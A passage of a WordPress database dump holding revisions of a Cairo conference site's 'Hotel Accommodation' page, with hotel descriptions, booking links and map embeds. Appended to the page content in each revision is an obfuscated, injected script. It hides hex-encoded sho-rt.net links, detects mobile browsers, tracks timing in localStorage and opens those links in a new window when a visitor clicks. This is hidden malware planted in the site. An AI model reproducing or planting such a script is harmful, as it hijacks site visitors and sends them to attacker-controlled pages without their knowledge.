)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-24 01:00:48','2023-06-24 01:00:48','',2685,'https://gsw2023.com/?p=4785',0,'revision','',0),
(4786,1,'2023-06-24 01:01:18','2023-06-24 01:01:18','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4783\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-24 01:01:18','2023-06-24 01:01:18','',2685,'https://gsw2023.com/?p=4786',0,'revision','',0),
(4787,1,'2023-06-24 01:01:49','2023-06-24 01:01:49','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator 